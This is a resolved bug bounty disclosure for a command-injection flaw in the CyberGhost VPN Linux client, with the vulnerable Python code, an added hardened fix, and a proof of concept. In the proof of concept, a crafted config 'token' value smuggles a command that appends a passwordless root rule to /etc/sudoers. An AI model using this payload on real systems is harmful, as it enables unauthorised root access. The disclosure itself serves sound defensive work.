Linux client - command injection - local privilege escalation

Disclosed by mmmdspl
  • Program: CyberGhost
  • Disclosed date: over 1 year ago
  • Points: 40
  • Priority: P1 (Bugcrowd VRT priority rating)
  • Status: Resolved (accepted and fixed)
Summary by CyberGhost

While mmmdspl initially submitted this vulnerability through our Vulnerability Disclosure Program, we immediately recognized the value of his research into our application and wanted to ensure he was rewarded for it, so we asked him to submit to our bug bounty program. We greatly appreciate his efforts to identify this local privilege escalation weakness in our Linux client application.

Summary by mmmdspl

Linux client has a command injection vulnerability. This vulnerability could be successfully exploited to escalate privileges to root in case the user has limited privileges and is allowed to run only cyberghostvpn command with sudo.

Report details
  • Target Location: CyberGhost Linux application
  • Target category: Other
  • VRT: Client-Side Injection
  • Priority: P1
  • Description

    I am resubmitting the report according to Brenton's advice - https://bugcrowd.com/submissions/e9a427ffe2dad4b409893bbd366c461ca658813a7f8fc6db9d47b36ab069f049

    Original report:

    Hello CyberGhost Team,

    I discovered that the Linux client has a command injection vulnerability. This vulnerability could be successfully exploited to escalate privileges to root in case the user has limited privileges and is allowed to run only cyberghostvpn command with sudo.

    The injection is located in wireguard-related code cyberghostvpn_ubuntu_18.04_extracted/PYZ-00.pyz_extracted/services/wireguard.py

        def __addKey(self, publicKey, hostname):
            token = self.getConfig('device', 'token')
            secret = self.getConfig('device', 'secret')
            # token and secret are read from the user-writable config.ini and spliced into a single shell string
            command = 'curl [...] --user "' + token + ':' + secret + '" --data-urlencode "pubkey=' + publicKey + '" "https://' + hostname + ':1337/addKey"'
            proc = Helpers().executeCommand(command)


    The values token and secret come from a user-controllable configuration file. These values could be modified to inject any command, which will be executed when establishing a new wireguard connection. As a result, a user that is allowed to connect to the VPN may escalate to root.

    PoC:
    1) Prerequisite - user is allowed to run only cyberghostvpn with sudo.

    $ sudo -l
    
    User user may run the following commands on myhost:
        (ALL) /usr/bin/cyberghostvpn
    
    $ sudo su
    Sorry, user user is not allowed to execute '/usr/bin/su' as root on myhost.
    

    2) User edits their own configuration file to provide the payload in the "token" value

    $ cd ~/.cyberghostvpn
    $ cp config.ini config.ini.bak
    
    $ cat config.ini
    [account]
    username = [redacted]
    password = [redacted]
    
    [device]
    name = Linux APP
    token = aaaa" --help;echo 'temp ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers;"
    secret = bbbb
    

    3) Connect to the VPN (now the payload will be executed with root privileges). The payload modifies /etc/sudoers, allowing the user to execute any command as root.

    $ sudo cyberghostvpn --wireguard --connect --country-code CZ
    Prepare Wireguard connection ...
    Select server ... prague-s401-i16
    Connecting ... 
    WIREGUARD error: cannot add key!
    

    4) Switch to root

    $ sudo -l
    
    User user may run the following commands on myhost:
        (ALL) /usr/bin/cyberghostvpn
        (ALL) NOPASSWD: ALL
    
    $ sudo su
    # whoami
    root
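
As an added example (not CyberGhost's code; the helper names build_addkey_argv and add_key and the sample hostname are assumptions), the hardened counterpart of the __addKey method quoted above: the same curl request built as an argv list and run without a shell, so a token like the one in the PoC stays a single argument instead of becoming shell syntax.

```python
import re
import subprocess
from typing import List

# The hostname is not user-configurable in the report, but the URL is still built
# from pieces, so restrict it to DNS label characters to keep the request on-target.
_HOSTNAME_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(\.(?!-)[A-Za-z0-9-]{1,63})*$")


def build_addkey_argv(token: str, secret: str, public_key: str, hostname: str) -> List[str]:
    """Return the curl argv for the addKey request (hypothetical helper).

    Every value read from config.ini (token, secret) and the public key are each
    their own argv element, so shell metacharacters inside them are never
    interpreted: there is no shell in the path at all.
    """
    if not token or not secret:
        raise ValueError("device token/secret missing from config")
    if not _HOSTNAME_RE.match(hostname):
        raise ValueError(f"refusing to build URL from hostname {hostname!r}")
    return [
        "curl", "--silent", "--show-error", "--fail",
        "--user", f"{token}:{secret}",
        "--data-urlencode", f"pubkey={public_key}",
        f"https://{hostname}:1337/addKey",
    ]


def add_key(token: str, secret: str, public_key: str, hostname: str) -> int:
    """Hardened counterpart of __addKey: run curl without a shell, return its exit code."""
    argv = build_addkey_argv(token, secret, public_key, hostname)
    # shell=False is the default; it is spelled out because it is the whole fix:
    # no /bin/sh ever parses the token, so `" --help;echo ... >> /etc/sudoers;"`
    # is merely an (invalid) credential that the server rejects.
    proc = subprocess.run(argv, shell=False, capture_output=True, text=True)
    return proc.returncode


if __name__ == "__main__":
    # Constructed sample input: the PoC token from the report and a made-up hostname.
    poc_token = "aaaa\" --help;echo 'temp ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers;\""
    for arg in build_addkey_argv(poc_token, "bbbb", "PUBKEY", "prague-s401-i16.example"):
        print(repr(arg))  # the whole payload shows up as one argument after --user
```

Credentials passed on argv are still visible to other local users in process listings; curl can read its options from stdin via `--config -` where that matters in the deployment.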
    